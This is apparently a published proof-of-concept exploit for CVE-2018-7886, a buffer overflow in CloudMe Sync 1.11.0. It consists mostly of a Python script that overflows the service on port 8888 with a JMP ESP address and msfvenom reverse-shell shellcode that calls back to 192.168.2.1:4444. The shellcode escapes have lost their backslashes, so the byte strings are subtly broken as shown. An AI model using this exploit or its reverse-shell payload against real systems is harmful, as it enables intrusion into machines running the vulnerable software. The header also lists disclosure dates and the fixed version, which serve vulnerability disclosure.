#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################

#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018

# Run this file in victim's win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.

import socket

target="127.0.0.1"

junk="A"*1052

eip="x7Bx8AxA9x68" #68a98a7b : JMP ESP - Qt5Core.dll

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c

shellcode=("xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68"
"x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68"
"xeax0fxdfxe0xffxd5x97x6ax05x68xc0xa8x02x01x68"
"x02x00x11x5cx89xe6x6ax10x56x57x68x99xa5x74x61"
"xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0xb5xa2"
"x56xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6"
"x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44"
"x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56"
"x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xff"
"x30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6"
"x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbb"
"x47x13x72x6fx6ax00x53xffxd5")

payload=junk+eip+shellcode

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)